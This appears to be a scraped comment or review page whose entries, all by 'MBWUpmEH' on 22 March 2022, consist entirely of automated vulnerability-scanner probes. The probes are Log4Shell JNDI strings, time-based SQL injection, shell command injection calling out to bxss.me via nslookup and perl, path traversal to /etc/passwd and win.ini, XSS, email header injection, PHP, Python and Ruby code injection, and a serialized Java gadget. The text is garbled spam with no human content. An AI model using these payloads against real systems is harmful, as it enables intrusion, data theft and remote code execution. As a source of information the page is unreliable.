�💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitvrgoymtyxi93231${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

MBWUpmEH

22 March 2022

5
ZZ7xLJiE') OR 870=(SELECT 870 FROM PG_SLEEP(15))--

1

MBWUpmEH

22 March 2022

4
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.009247.80-2917.80.61d4e${::-.}1${::-.}bxss.me}}

MBWUpmEH

22 March 2022

4

response.write(9014659*9381003)

MBWUpmEH

22 March 2022

4
/../../../../../../../../../../windows/system32/BITSADMIN.exe

MBWUpmEH

22 March 2022

5
Mr.

echo noohad$()\ htbwjj\nz^xyu||a #' &echo noohad$()\ htbwjj\nz^xyu||a #|" &echo noohad$()\ htbwjj\nz^xyu||a #

MBWUpmEH

22 March 2022

4

/../../../../../../../../../../windows/system32/BITSADMIN.exe

MBWUpmEH

22 March 2022

4

${j${::-n}di:dns${::-:}${::-/}/hitbputclglbse4c08${::-.}bxss.me}zzzz

MBWUpmEH

22 March 2022

4

'+response.write(9014659*9381003)+'

MBWUpmEH

22 March 2022

5
Is1iFA9i')) OR 268=(SELECT 268 FROM PG_SLEEP(15))--

1

MBWUpmEH

22 March 2022

1
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%4F%33%54%4F%289969%29%3C%2F%73%43%72%69%70%54%3E

555

MBWUpmEH

22 March 2022

5
Mr.

&echo gxwfks$()\ jtcygm\nz^xyu||a #' &echo gxwfks$()\ jtcygm\nz^xyu||a #|" &echo gxwfks$()\ jtcygm\nz^xyu||a #

MBWUpmEH

22 March 2022

4

"+response.write(9014659*9381003)+"

MBWUpmEH

22 March 2022

4

�💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hiteadwrzyospf36b7${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

MBWUpmEH

22 March 2022

4

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.009247.80-2918.80.61d4e${::-.}1${::-.}bxss.me}}

MBWUpmEH

22 March 2022

5
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1

MBWUpmEH

22 March 2022

1
Mr.\u003CScRiPt\O3TO(9852)\u003C/sCripT\u003E

555

MBWUpmEH

22 March 2022

5
Mr.

|echo flxxyo$()\ selbvh\nz^xyu||a #' |echo flxxyo$()\ selbvh\nz^xyu||a #|" |echo flxxyo$()\ selbvh\nz^xyu||a #

MBWUpmEH

22 March 2022

5
1'"

1

MBWUpmEH

22 March 2022

5
1����%2527%2522

1

MBWUpmEH

22 March 2022

1
Mr.&lt;ScRiPt&gt;O3TO(9255)&lt;/sCripT&gt;

555

MBWUpmEH

22 March 2022

4
7bRb8LBs

MBWUpmEH

22 March 2022

5
Mr.

(nslookup hitqdjpserlbgff337.bxss.me||perl -e "gethostbyname('hitqdjpserlbgff337.bxss.me')")

MBWUpmEH

22 March 2022

5
@@7TdI1

1

MBWUpmEH

22 March 2022

4

TpeFVe5o

MBWUpmEH

22 March 2022

5
Mr.

$(nslookup hitetnqugdxxd54c63.bxss.me||perl -e "gethostbyname('hitetnqugdxxd54c63.bxss.me')")

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

&(nslookup hittiljzqslhgbce0b.bxss.me||perl -e "gethostbyname('hittiljzqslhgbce0b.bxss.me')")&'\"`0&(nslookup hittiljzqslhgbce0b.bxss.me||perl -e "gethostbyname('hittiljzqslhgbce0b.bxss.me')")&`'

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

|(nslookup hitazmhwjckquda563.bxss.me||perl -e "gethostbyname('hitazmhwjckquda563.bxss.me')")

MBWUpmEH

22 March 2022

1
Mr.}body{acu:Expre/**/SSion(O3TO(9802))}

555

MBWUpmEH

22 March 2022

4
%0abcc:009247.80-2923.80.61d4e.19073.2@bxss.me

MBWUpmEH

22 March 2022

5
Mr.

`(nslookup hitgsxtkvpjsja40b3.bxss.me||perl -e "gethostbyname('hitgsxtkvpjsja40b3.bxss.me')")`

MBWUpmEH

22 March 2022

5
Mr.

EeChey3Z

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

4
to@example.com>%0d%0abcc:009247.80-2924.80.61d4e.19073.2@bxss.me

MBWUpmEH

22 March 2022

5
Mr.

-1 OR 2+367-367-1=0+0+0+1 --

MBWUpmEH

22 March 2022

5
Mr.

;(nslookup hitftezqprrked8c49.bxss.me||perl -e "gethostbyname('hitftezqprrked8c49.bxss.me')")|(nslookup hitftezqprrked8c49.bxss.me||perl -e "gethostbyname('hitftezqprrked8c49.bxss.me')")&(nslookup hitftezqprrked8c49.bxss.me||perl -e "gethostbyname('hitftezqprrked8c49.bxss.me')")

MBWUpmEH

22 March 2022

4

%0abcc:009247.80-2925.80.61d4e.19073.2@bxss.me

MBWUpmEH

22 March 2022

5
Mr.

-1 OR 2+119-119-1=0+0+0+1

MBWUpmEH

22 March 2022

4

to@example.com>%0d%0abcc:009247.80-2926.80.61d4e.19073.2@bxss.me

MBWUpmEH

22 March 2022

5
Mr.

-1' OR 2+832-832-1=0+0+0+1 --

MBWUpmEH

22 March 2022

5
Mr.

-1' OR 2+547-547-1=0+0+0+1 or 'BMUGlp5Q'='

MBWUpmEH

22 March 2022

4
../../../../../../../../../../../../../../etc/passwd

MBWUpmEH

22 March 2022

5
Mr.

-1" OR 2+864-864-1=0+0+0+1 --

MBWUpmEH

22 March 2022

4
../../../../../../../../../../../../../../windows/win.ini

MBWUpmEH

22 March 2022

5
Mr.

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

22 March 2022

4
C:\WINDOWS\system32\drivers\etc\hosts

MBWUpmEH

22 March 2022

5
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

22 March 2022

4
../../../../../../../../../../windows/win.ini%00.jpg

MBWUpmEH

22 March 2022

5
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

22 March 2022

4
/../../../../../../../../../../boot.ini

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

4
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

MBWUpmEH

22 March 2022

4
echo tmvjwu$()\ qjlbbg\nz^xyu||a #' &echo tmvjwu$()\ qjlbbg\nz^xyu||a #|" &echo tmvjwu$()\ qjlbbg\nz^xyu||a #

MBWUpmEH

22 March 2022

5
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

22 March 2022

4
${9999396+9999035}

MBWUpmEH

22 March 2022

4
&echo ykltcx$()\ xetltj\nz^xyu||a #' &echo ykltcx$()\ xetltj\nz^xyu||a #|" &echo ykltcx$()\ xetltj\nz^xyu||a #

MBWUpmEH

22 March 2022

4
..\..\..\..\..\..\..\..\windows\win.ini

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

4

${9999694+9999525}

MBWUpmEH

22 March 2022

4
|echo nkwdnb$()\ honuvv\nz^xyu||a #' |echo nkwdnb$()\ honuvv\nz^xyu||a #|" |echo nkwdnb$()\ honuvv\nz^xyu||a #

MBWUpmEH

22 March 2022

4
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

MBWUpmEH

22 March 2022

4
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

MBWUpmEH

22 March 2022

5
Mr.

-1; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
(nslookup hitlaetbqucem25f9b.bxss.me||perl -e "gethostbyname('hitlaetbqucem25f9b.bxss.me')")

MBWUpmEH

22 March 2022

4
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

4
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

MBWUpmEH

22 March 2022

4

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

MBWUpmEH

22 March 2022

5
Mr.

-1); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
$(nslookup hithchlzthbjhe27cc.bxss.me||perl -e "gethostbyname('hithchlzthbjhe27cc.bxss.me')")

MBWUpmEH

22 March 2022

4
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

MBWUpmEH

22 March 2022

5
Mr.

-1)); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
��srjava.util.HashMap���`�F loadFactorI thresholdxp?@ wsr java.net.URL�%76��rIhashCodeIportL authoritytLjava/lang/String;Lfileq~Lhostq~Lprotocolq~Lrefq~xp��������thittegbbbotpg86890.bxss.met/q~thttppxt"http://hittegbbbotpg86890.bxss.me/x

MBWUpmEH

22 March 2022

4
&(nslookup hitjnhqrsahij57e36.bxss.me||perl -e "gethostbyname('hitjnhqrsahij57e36.bxss.me')")&'\"`0&(nslookup hitjnhqrsahij57e36.bxss.me||perl -e "gethostbyname('hitjnhqrsahij57e36.bxss.me')")&`'

MBWUpmEH

22 March 2022

4
&n917068=v917282

MBWUpmEH

22 March 2022

5
Mr.

1 waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4

��srjava.util.HashMap���`�F loadFactorI thresholdxp?@ wsr java.net.URL�%76��rIhashCodeIportL authoritytLjava/lang/String;Lfileq~Lhostq~Lprotocolq~Lrefq~xp��������thitjidkcbsszmfa588.bxss.met/q~thttppxt"http://hitjidkcbsszmfa588.bxss.me/x

MBWUpmEH

22 March 2022

4
|(nslookup hitqrsnrmxboz51550.bxss.me||perl -e "gethostbyname('hitqrsnrmxboz51550.bxss.me')")

MBWUpmEH

22 March 2022

4
WEB-INF/web.xml

MBWUpmEH

22 March 2022

5
Mr.

K8GG5oc2'; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4

&n905160=v914625

MBWUpmEH

22 March 2022

4
WEB-INF\web.xml

MBWUpmEH

22 March 2022

4
`(nslookup hitvjypxjtmaef6353.bxss.me||perl -e "gethostbyname('hitvjypxjtmaef6353.bxss.me')")`

MBWUpmEH

22 March 2022

5
Mr.

UVBgxdCy'); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4

../../../../../../../../../../../../../../etc/passwd

MBWUpmEH

22 March 2022

5
Mr.

b7XoeqE4')); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
;(nslookup hitwaobdkfzfq5df84.bxss.me||perl -e "gethostbyname('hitwaobdkfzfq5df84.bxss.me')")|(nslookup hitwaobdkfzfq5df84.bxss.me||perl -e "gethostbyname('hitwaobdkfzfq5df84.bxss.me')")&(nslookup hitwaobdkfzfq5df84.bxss.me||perl -e "gethostbyname('hitwaobdkfzfq5df84.bxss.me')")

MBWUpmEH

22 March 2022

4

../../../../../../../../../../../../../../windows/win.ini

MBWUpmEH

22 March 2022

4

C:\WINDOWS\system32\drivers\etc\hosts

MBWUpmEH

22 March 2022

5
Mr.

-5 OR 406=(SELECT 406 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4

echo jncves$()\ jkaqtf\nz^xyu||a #' &echo jncves$()\ jkaqtf\nz^xyu||a #|" &echo jncves$()\ jkaqtf\nz^xyu||a #

MBWUpmEH

22 March 2022

4

../../../../../../../../../../windows/win.ini%00.jpg

MBWUpmEH

22 March 2022

4

&echo tippwx$()\ axclzz\nz^xyu||a #' &echo tippwx$()\ axclzz\nz^xyu||a #|" &echo tippwx$()\ axclzz\nz^xyu||a #

MBWUpmEH

22 March 2022

4
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

MBWUpmEH

22 March 2022

4

/../../../../../../../../../../boot.ini

MBWUpmEH

22 March 2022

5
Mr.

-5) OR 948=(SELECT 948 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4

|echo cckame$()\ zsokaz\nz^xyu||a #' |echo cckame$()\ zsokaz\nz^xyu||a #|" |echo cckame$()\ zsokaz\nz^xyu||a #

MBWUpmEH

22 March 2022

4

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

MBWUpmEH

22 March 2022

4
)

MBWUpmEH

22 March 2022

4
1some_inexistent_file_with_long_name%00.jpg

MBWUpmEH

22 March 2022

4

(nslookup hitutoeoikuqc121ba.bxss.me||perl -e "gethostbyname('hitutoeoikuqc121ba.bxss.me')")

MBWUpmEH

22 March 2022

4

..\..\..\..\..\..\..\..\windows\win.ini

MBWUpmEH

22 March 2022

4
Http://bxss.me/t/fit.txt

MBWUpmEH

22 March 2022

4
!(()&&!|*|*|

MBWUpmEH

22 March 2022

5
Mr.

-1)) OR 662=(SELECT 662 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4

$(nslookup hitndcysywolq63b89.bxss.me||perl -e "gethostbyname('hitndcysywolq63b89.bxss.me')")

MBWUpmEH

22 March 2022

4

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

MBWUpmEH

22 March 2022

4
^(#$!@#$)(()))******

MBWUpmEH

22 March 2022

4
http://bxss.me/t/fit.txt%3F.jpg

MBWUpmEH

22 March 2022

4

&(nslookup hitdzbjupqlbcff4b1.bxss.me||perl -e "gethostbyname('hitdzbjupqlbcff4b1.bxss.me')")&'\"`0&(nslookup hitdzbjupqlbcff4b1.bxss.me||perl -e "gethostbyname('hitdzbjupqlbcff4b1.bxss.me')")&`'

MBWUpmEH

22 March 2022

5
Mr.

kjpnMtda' OR 201=(SELECT 201 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
bxss.me

MBWUpmEH

22 March 2022

4

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

MBWUpmEH

22 March 2022

4

)

MBWUpmEH

22 March 2022

4

|(nslookup hitoxtnfxxjfu82ad4.bxss.me||perl -e "gethostbyname('hitoxtnfxxjfu82ad4.bxss.me')")

MBWUpmEH

22 March 2022

4

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

MBWUpmEH

22 March 2022

4

!(()&&!|*|*|

MBWUpmEH

22 March 2022

4

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

MBWUpmEH

22 March 2022

4

`(nslookup hitlelatukdgm31477.bxss.me||perl -e "gethostbyname('hitlelatukdgm31477.bxss.me')")`

MBWUpmEH

22 March 2022

5
Mr.

CFrAGzEl') OR 38=(SELECT 38 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4

^(#$!@#$)(()))******

MBWUpmEH

22 March 2022

4

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

MBWUpmEH

22 March 2022

4

1some_inexistent_file_with_long_name%00.jpg

MBWUpmEH

22 March 2022

4

;(nslookup hitvpfhzuaocib416e.bxss.me||perl -e "gethostbyname('hitvpfhzuaocib416e.bxss.me')")|(nslookup hitvpfhzuaocib416e.bxss.me||perl -e "gethostbyname('hitvpfhzuaocib416e.bxss.me')")&(nslookup hitvpfhzuaocib416e.bxss.me||perl -e "gethostbyname('hitvpfhzuaocib416e.bxss.me')")

MBWUpmEH

22 March 2022

4
'.gethostbyname(lc('hitrt'.'lgaavfvobdff7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(68).chr(98).chr(77).'

MBWUpmEH

22 March 2022

4

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

MBWUpmEH

22 March 2022

4

Http://bxss.me/t/fit.txt

MBWUpmEH

22 March 2022

5
Mr.

qO0GUxk7')) OR 892=(SELECT 892 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
".gethostbyname(lc("hitmm"."waroieebabdd2.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(83).chr(97).chr(83)."

MBWUpmEH

22 March 2022

4

WEB-INF/web.xml

MBWUpmEH

22 March 2022

4

http://bxss.me/t/fit.txt%3F.jpg

MBWUpmEH

22 March 2022

4

'.gethostbyname(lc('hitqu'.'qqhwrkpnf3c3d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(82).chr(109).chr(65).'

MBWUpmEH

22 March 2022

5
Mr.

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

22 March 2022

4

WEB-INF\web.xml

MBWUpmEH

22 March 2022

4

bxss.me

MBWUpmEH

22 March 2022

5
Mr.

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

22 March 2022

4

".gethostbyname(lc("hittg"."pkdjywxg2e592.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(83).chr(105).chr(66)."

MBWUpmEH

22 March 2022

5
Mr.

1'"

MBWUpmEH

22 March 2022

5
Mr.

1����%2527%2522

MBWUpmEH

22 March 2022

4
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitbcvzerxtmmb7b11.'+'bxss.me')

MBWUpmEH

22 March 2022

4
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitbcvzerxtmmb7b11."+"bxss.me")+'

MBWUpmEH

22 March 2022

5
Mr.

@@DCgUp

MBWUpmEH

22 March 2022

4
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitbcvzerxtmmb7b11.'+'bxss.me')+"

MBWUpmEH

22 March 2022

4
HttP://bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

4

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitykcdusgctt4f7d5.'+'bxss.me')

MBWUpmEH

22 March 2022

4
bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

4
"+"A".concat(70-3).concat(22*4).concat(107).concat(79).concat(111).concat(87)+(require"socket" Socket.gethostbyname("hitqv"+"gbrptqhu8802b.bxss.me.")[3].to_s)+"

MBWUpmEH

22 March 2022

4

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitykcdusgctt4f7d5."+"bxss.me")+'

MBWUpmEH

22 March 2022

4
http://hitoswivdamtk.bxss.me/

MBWUpmEH

22 March 2022

4

HttP://bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

4
'+'A'.concat(70-3).concat(22*4).concat(111).concat(69).concat(117).concat(83)+(require'socket' Socket.gethostbyname('hityy'+'lqcekain2d2ae.bxss.me.')[3].to_s)+'

MBWUpmEH

22 March 2022

4

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitykcdusgctt4f7d5.'+'bxss.me')+"

MBWUpmEH

22 March 2022

4

bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

4

http://hitamfdfgdpxa.bxss.me/

MBWUpmEH

22 March 2022

4

"+"A".concat(70-3).concat(22*4).concat(122).concat(82).concat(101).concat(76)+(require"socket" Socket.gethostbyname("hitrv"+"dobsgsff2f28d.bxss.me.")[3].to_s)+"

MBWUpmEH

22 March 2022

4
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

MBWUpmEH

22 March 2022

5
Mr.9510668

1

MBWUpmEH

22 March 2022

4

'+'A'.concat(70-3).concat(22*4).concat(114).concat(89).concat(104).concat(70)+(require'socket' Socket.gethostbyname('hitbj'+'wmiryhil88c22.bxss.me.')[3].to_s)+'

MBWUpmEH

22 March 2022

4
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

MBWUpmEH

22 March 2022

4

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

MBWUpmEH

22 March 2022

4
/xfs.bxss.me

MBWUpmEH

22 March 2022

4
';print(md5(31337));$a='

MBWUpmEH

22 March 2022

4

/xfs.bxss.me

MBWUpmEH

22 March 2022

4
";print(md5(31337));$a="

MBWUpmEH

22 March 2022

4
${@print(md5(31337))}

MBWUpmEH

22 March 2022

5
acu10666%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10666

1

MBWUpmEH

22 March 2022

4
${@print(md5(31337))}\

MBWUpmEH

22 March 2022

4
'"

MBWUpmEH

22 March 2022

4
'.print(md5(31337)).'

MBWUpmEH

22 March 2022

5
acux7284%C0%BEz1%C0%BCz2a%90bcxuca7284

1

MBWUpmEH

22 March 2022

4
1

MBWUpmEH

22 March 2022

49339425

MBWUpmEH

22 March 2022

4

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

MBWUpmEH

22 March 2022

4

'"

MBWUpmEH

22 March 2022

5
<%={{={@{#{${acx}}%>

1

MBWUpmEH

22 March 2022

4

';print(md5(31337));$a='

MBWUpmEH

22 March 2022

4
1

MBWUpmEH

22 March 2022

4

";print(md5(31337));$a="

MBWUpmEH

22 March 2022

4
ceIRen6o

MBWUpmEH

22 March 2022

4

${@print(md5(31337))}

